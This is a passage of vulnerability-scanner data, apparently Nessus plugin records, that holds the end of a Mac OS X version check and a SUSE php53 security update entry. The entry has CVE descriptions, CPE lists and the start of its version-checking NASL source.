(isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-09T01:30:05", "description": "This update for php53 to version 5.3.17 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n\n - CVE-2016-5094: Don't create strings with lengths outside int range (bnc#982011).\n\n - CVE-2016-5095: Don't create strings with lengths outside int range (bnc#982012).\n\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP mishandles driver behavior for SQL_WVARCHAR columns, which allowed remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table (bsc#981050).\n\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP allowed remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation (bsc#980366).\n\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed remote attackers to cause a denial of service via a crafted imagefilltoborder call (bsc#980375).\n\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c in PHP allowed remote attackers to cause a denial of service (segmentation fault) via recursive method calls (bsc#980373).\n\n - CVE-2016-4540: The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset (bsc#978829).\n\n - CVE-2016-4541: The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset (bsc#978829.\n\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in PHP did not properly construct spprintf arguments, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830).\n\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP did not validate IFD sizes, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830.\n\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c in PHP did not validate TIFF start data, which allowed remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data (bsc#978830.\n\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP accepted a negative integer for the scale argument, which allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted call (bsc#978827).\n\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP modified certain data structures without considering whether they are copies of the _zero_, _one_, or _two_ global variable, which allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted call (bsc#978827).\n\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in PHP allowed remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero (bsc#978828).\n\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length uncompressed data, which allowed remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n\n - CVE-2016-4346: Integer overflow in the str_pad function in ext/standard/string.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a long string, leading to a heap-based buffer overflow (bsc#977994).\n\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted mb_strcut call (bsc#977003).\n\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP incorrectly relied on the deprecated RAND_pseudo_bytes function, which made it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors (bsc#977005).\n\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP allowed remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function (bsc#976997).\n\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not isolate each thread from libxml_disable_entity_loader changes in other threads, which allowed remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161 (bsc#976996).\n\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to mean that SSL is optional, which allowed man-in-the-middle attackers to spoof servers via a cleartext-downgrade attack, a related issue to CVE-2015-3152 (bsc#973792).\n\n - CVE-2015-8835: The make_http_soap_request function in ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c (bsc#973351).\n\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX extension in PHP allowed remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element (bsc#969821).\n\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR extension in PHP allowed remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\x05\\x06 signature at an invalid location (bsc#971912).\n\n - CVE-2014-9767: Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary empty directories via a crafted ZIP archive (bsc#971612).\n\n - CVE-2016-3185: The make_http_soap_request function in ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized _cookies data, related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive (bsc#968284).\n\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in PHP allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a .phar file with a crafted TAR archive entry in which the Link indicator references a file that did not exist (bsc#949961).\n\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP allowed remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization (bsc#942291).\n\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class in PHP allowed remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call (bsc#942296.\n\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP did not properly manage headers, which allowed remote attackers to execute arbitrary code via crafted serialized data that triggers a 'type confusion' in the serialize_function_call function (bsc#945428).\n\n - CVE-2015-6837: The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider the possibility of a NULL valuePop return value proceeding with a free operation during initial error checking, which allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6838 (bsc#945412).\n\n - CVE-2015-6838: The xsl_ext_function_php function in ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider the possibility of a NULL valuePop return value proceeding with a free operation after the principal argument loop, which allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted XML document, a different vulnerability than CVE-2015-6837 (bsc#945412).\n\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath function in ext/phar/phar.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via a large length value, as demonstrated by mishandling of an e-mail attachment by the imap PHP extension (bsc#938719).\n\n - CVE-2015-5589: The phar_convert_to_other function in ext/phar/phar_object.c in PHP did not validate a file pointer a close operation, which allowed remote attackers to cause a denial of service (segmentation fault) or possibly have unspecified other impact via a crafted TAR archive that is mishandled in a Phar::convertToData call (bsc#938721).\n\n - CVE-2015-4602: The __PHP_Incomplete_Class function in ext/standard/incomplete_class.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935224).\n\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in PHP allowed remote attackers to obtain sensitive information, cause a denial of service (application crash), or possibly execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935226).\n\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to 'type confusion' issues in the (1) SoapClient::__getLastRequest, (2) SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders, (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies, and (6) SoapClient::__setCookie methods (bsc#935226).\n\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an unexpected data type, related to 'type confusion' issues in (1) ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3) ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n\n - CVE-2015-4603: The exception::getTraceAsString function in Zend/zend_exceptions.c in PHP allowed remote attackers to execute arbitrary code via an unexpected data type, related to a 'type confusion' issue (bsc#935234).\n\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP did not validate token extraction for table names, which might allowed remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted name. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-1352 (bsc#935274).\n\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4022 (bsc#935275).\n\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read or write to arbitrary files via crafted input to an application that calls (1) a DOMDocument load method, (2) the xmlwriter_open_uri function, (3) the finfo_file function, or (4) the hash_hmac_file function, as demonstrated by a filename\\0.xml attack that bypasses an intended configuration in which client users may read only .xml files (bsc#935227).\n\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read arbitrary files via crafted input to an application that calls the stream_resolve_include_path function in ext/standard/streamsfuncs.c, as demonstrated by a filename\\0.extension attack that bypasses an intended configuration in which client users may read files with only one specific extension (bsc#935229).\n\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences, which might have allowed remote attackers to read or write to arbitrary files via crafted input to an application that calls (1) a DOMDocument save method or (2) the GD imagepsloadfont function, as demonstrated by a filename\\0.html attack that bypasses an intended configuration in which client users may write to only .html files (bsc#935232).\n\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did not verify that the uri property is a string, which allowed remote attackers to obtain sensitive information by providing crafted serialized data with an int data type, related to a 'type confusion' issue (bsc#933227).\n\n - CVE-2015-4024: Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP allowed remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome (bsc#931421).\n\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname upon encountering a \\x00 character, which might allowed remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow (bsc#931772).\n\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP did not verify that the first character of a filename is different from the \\0 character, which allowed remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive (bsc#931769).\n\n - CVE-2015-3329: Multiple stack-based buffer overflows in the phar_set_inode function in phar_internal.h in PHP allowed remote attackers to execute arbitrary code via a crafted length value in a (1) tar, (2) phar, or (3) ZIP archive (bsc#928506).\n\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain sensitive information from process memory or cause a denial of service (buffer over-read and application crash) via a crafted length value in conjunction with crafted serialized data in a phar archive, related to the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages use of the unset function within an __wakeup function, a related issue to CVE-2015-0231 (bsc#924972).\n\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 2.1.1 and earlier, as used in PHP allowed remote attackers to cause a denial of service (buffer over-read and application crash) via a crafted GIF image that is improperly handled by the gdImageCreateFromGif function (bsc#923945).\n\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive function in phar_object.c in PHP allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger an attempted renaming of a Phar archive to the name of an existing file (bsc#922452).\n\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might have allowed context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow (bsc#921950).\n\n - CVE-2014-9705: Heap-based buffer overflow in the enchant_broker_request_dict function in ext/enchant/enchant.c in PHP allowed remote attackers to execute arbitrary code via vectors that trigger creation of multiple dictionaries (bsc#922451).\n\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary code via crafted serialized input containing a (1) R or (2) r type specifier in (a) DateTimeZone data handled by the php_date_timezone_initialize_from_hash function or (b) DateTime data handled by the php_date_initialize_from_hash function (bsc#918768).\n\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in the Fileinfo component in PHP did not properly handle a certain string-length field during a copy of a truncated version of a Pascal string, which might allowed remote attackers to cause a denial of service (out-of-bounds memory access and application crash) via a crafted file (bsc#917150).\n\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 (bsc#910659).\n\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142 (bsc#910659).\n\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP allowed remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate keys within the serialized properties of an object, a different vulnerability than CVE-2004-1019 (bsc#910659).\n\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in PHP allowed remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image (bsc#914690).\n\n - CVE-2014-3670: The exif_ifd_make_value function in exif.c in the EXIF extension in PHP operates on floating-point arrays incorrectly, which allowed remote attackers to cause a denial of service (heap memory corruption and application crash) or possibly execute arbitrary code via a crafted JPEG image with TIFF thumbnail data that is improperly handled by the exif_thumbnail function (bsc#902357).\n\n - CVE-2014-3669: Integer overflow in the object_custom function in ext/standard/var_unserializer.c in PHP allowed remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via an argument to the unserialize function that triggers calculation of a large length value (bsc#902360).\n\n - CVE-2014-3668: Buffer overflow in the date_from_ISO8601 function in the mkgmtime implementation in libxmlrpc/xmlrpc.c in the XMLRPC extension in PHP allowed remote attackers to cause a denial of service (application crash) via (1) a crafted first argument to the xmlrpc_set_type function or (2) a crafted argument to the xmlrpc_decode function, related to an out-of-bounds read operation (bsc#902368).\n\n - CVE-2014-5459: The PEAR_REST class in REST.php in PEAR in PHP allowed local users to write to arbitrary files via a symlink attack on a (1) rest.cachefile or (2) rest.cacheid file in /tmp/pear/cache/, related to the retrieveCacheFirst and useLocalCache functions (bsc#893849).\n\n - CVE-2014-3597: Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP allowed remote DNS servers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted DNS record, related to the dns_get_record function and the dn_expand function. NOTE: this issue exists because of an incomplete fix for CVE-2014-4049 (bsc#893853).\n\n - CVE-2014-4670: Use-after-free vulnerability in ext/spl/spl_dllist.c in the SPL component in PHP allowed context-dependent attackers to cause a denial of service or possibly have unspecified other impact via crafted iterator usage within applications in certain web-hosting environments (bsc#886059).\n\n - CVE-2014-4698: Use-after-free vulnerability in ext/spl/spl_array.c in the SPL component in PHP allowed context-dependent attackers to cause a denial of service or possibly have unspecified other impact via crafted ArrayIterator usage within applications in certain web-hosting environments (bsc#886060).\n\n - CVE-2014-4721: The phpinfo implementation in ext/standard/info.c in PHP did not ensure use of the string data type for the PHP_AUTH_PW, PHP_AUTH_TYPE, PHP_AUTH_USER, and PHP_SELF variables, which might allowed context-dependent attackers to obtain sensitive information from process memory by using the integer data type with crafted values, related to a 'type confusion' vulnerability, as demonstrated by reading a private SSL key in an Apache HTTP Server web-hosting environment with mod_ssl and a PHP 5.3.x mod_php (bsc#885961).\n\n - CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file as used in the Fileinfo component in PHP allowed remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file (bsc#884986).\n\n - CVE-2014-3478: Buffer overflow in the mconvert function in softmagic.c in file as used in the Fileinfo component in PHP allowed remote attackers to cause a denial of service (application crash) via a crafted Pascal string in a FILE_PSTRING conversion (bsc#884987).\n\n - CVE-2014-3479: The cdf_check_stream_offset function in cdf.c in file as used in the Fileinfo component in PHP relies on incorrect sector-size data, which allowed remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file (bsc#884989).\n\n - CVE-2014-3480: The cdf_count_chain function in cdf.c in file as used in the Fileinfo component in PHP did not properly validate sector-count data, which allowed remote attackers to cause a denial of service (application crash) via a crafted CDF file (bsc#884990).\n\n - CVE-2014-3487: The cdf_read_property_info function in file as used in the Fileinfo component in PHP did not properly validate a stream offset, which allowed remote attackers to cause a denial of service (application crash) via a crafted CDF file (bsc#884991).\n\n - CVE-2014-3515: The SPL component in PHP incorrectly anticipates that certain data structures will have the array data type after unserialization, which allowed remote attackers to execute arbitrary code via a crafted string that triggers use of a Hashtable destructor, related to 'type confusion' issues in (1) ArrayObject and (2) SPLObjectStorage (bsc#884992).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2016:1638-1) (BACKRONYM)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-1019", "CVE-2006-7243", "CVE-2014-0207", "CVE-2014-3478", "CVE-2014-3479", "CVE-2014-3480", "CVE-2014-3487", "CVE-2014-3515", "CVE-2014-3597", "CVE-2014-3668", "CVE-2014-3669", "CVE-2014-3670", "CVE-2014-4049", "CVE-2014-4670", "CVE-2014-4698", "CVE-2014-4721", "CVE-2014-5459", "CVE-2014-8142", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2014-9767", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-1352", "CVE-2015-2301", "CVE-2015-2305", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3152", "CVE-2015-3329", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4021", "CVE-2015-4022", "CVE-2015-4024", "CVE-2015-4026", "CVE-2015-4116", "CVE-2015-4148", "CVE-2015-4598", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4643", "CVE-2015-4644", "CVE-2015-5161", "CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-8835", "CVE-2015-8838", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8873", "CVE-2015-8874", "CVE-2015-8879", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4073", "CVE-2016-4342", "CVE-2016-4346", "CVE-2016-4537", "CVE-2016-4538", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-4543", "CVE-2016-4544", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-5114"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1638-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93161", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1638-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93161);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2006-7243\", \"CVE-2014-0207\", \"CVE-2014-3478\", \"CVE-2014-3479\", \"CVE-2014-3480\", \"CVE-2014-3487\", \"CVE-2014-3515\", \"CVE-2014-3597\", \"CVE-2014-3668\", \"CVE-2014-3669\", \"CVE-2014-3670\", \"CVE-2014-4049\", \"CVE-2014-4670\", \"CVE-2014-4698\", \"CVE-2014-4721\", \"CVE-2014-5459\", \"CVE-2014-8142\", \"CVE-2014-9652\", \"CVE-2014-9705\", \"CVE-2014-9709\", \"CVE-2014-9767\", \"CVE-2015-0231\", \"CVE-2015-0232\", \"CVE-2015-0273\", \"CVE-2015-1352\", \"CVE-2015-2301\", \"CVE-2015-2305\", \"CVE-2015-2783\", \"CVE-2015-2787\", \"CVE-2015-3152\", \"CVE-2015-3329\", \"CVE-2015-3411\", \"CVE-2015-3412\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4026\", \"CVE-2015-4116\", \"CVE-2015-4148\", \"CVE-2015-4598\", \"CVE-2015-4599\", \"CVE-2015-4600\", \"CVE-2015-4601\", \"CVE-2015-4602\", \"CVE-2015-4603\", \"CVE-2015-4643\", \"CVE-2015-4644\", \"CVE-2015-5161\", \"CVE-2015-5589\", \"CVE-2015-5590\", \"CVE-2015-6831\", \"CVE-2015-6833\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-8835\", \"CVE-2015-8838\", \"CVE-2015-8866\", \"CVE-2015-8867\", \"CVE-2015-8873\", \"CVE-2015-8874\", \"CVE-2015-8879\", \"CVE-2016-2554\", \"CVE-2016-3141\", \"CVE-2016-3142\", \"CVE-2016-3185\", \"CVE-2016-4070\", \"CVE-2016-4073\", \"CVE-2016-4342\", \"CVE-2016-4346\", \"CVE-2016-4537\", \"CVE-2016-4538\", \"CVE-2016-4539\", \"CVE-2016-4540\", \"CVE-2016-4541\", \"CVE-2016-4542\", \"CVE-2016-4543\", \"CVE-2016-4544\", \"CVE-2016-5093\", \"CVE-2016-5094\", \"CVE-2016-5095\", \"CVE-2016-5096\", \"CVE-2016-5114\");\n script_bugtraq_id(44951, 68007, 68120, 68237, 68238, 68239, 68241, 68243, 68423, 68511, 68513, 69322, 69388, 70611, 70665, 70666, 71791, 71932, 72505, 72539, 72541, 72611, 72701, 73031, 73037, 73306, 73431, 74239, 74240, 74398, 74413, 74700, 74902, 74903, 75056, 75103, 75244, 75246, 75249, 75250, 75251, 75252, 75255, 75291, 75292, 75970, 75974);\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2016:1638-1) (BACKRONYM)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php53 to version 5.3.17 fixes the following issues :\n\nThese security issues were fixed :\n\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read\n (bnc#982010).\n\n - CVE-2016-5094: Don't create strings with lengths outside\n int range (bnc#982011).\n\n - CVE-2016-5095: Don't create strings with lengths outside\n int range (bnc#982012).\n\n - CVE-2016-5096: int/size_t confusion in fread\n (bsc#982013).\n\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow\n (bnc#982162).\n\n - CVE-2015-8879: The odbc_bindcols function in\n ext/odbc/php_odbc.c in PHP mishandles driver behavior\n for SQL_WVARCHAR columns, which allowed remote attackers\n to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table (bsc#981050).\n\n - CVE-2015-4116: Use-after-free vulnerability in the\n spl_ptr_heap_insert function in ext/spl/spl_heap.c in\n PHP allowed remote attackers to execute arbitrary code\n by triggering a failed SplMinHeap::compare operation\n (bsc#980366).\n\n - CVE-2015-8874: Stack consumption vulnerability in GD in\n PHP allowed remote attackers to cause a denial of\n service via a crafted imagefilltoborder call\n (bsc#980375).\n\n - CVE-2015-8873: Stack consumption vulnerability in\n Zend/zend_exceptions.c in PHP allowed remote attackers\n to cause a denial of service (segmentation fault) via\n recursive method calls (bsc#980373).\n\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset (bsc#978829).\n\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset (bsc#978829.\n\n - CVE-2016-4542: The exif_process_IFD_TAG function in\n ext/exif/exif.c in PHP did not properly construct\n spprintf arguments, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or\n possibly have unspecified other impact via crafted\n header data (bsc#978830).\n\n - 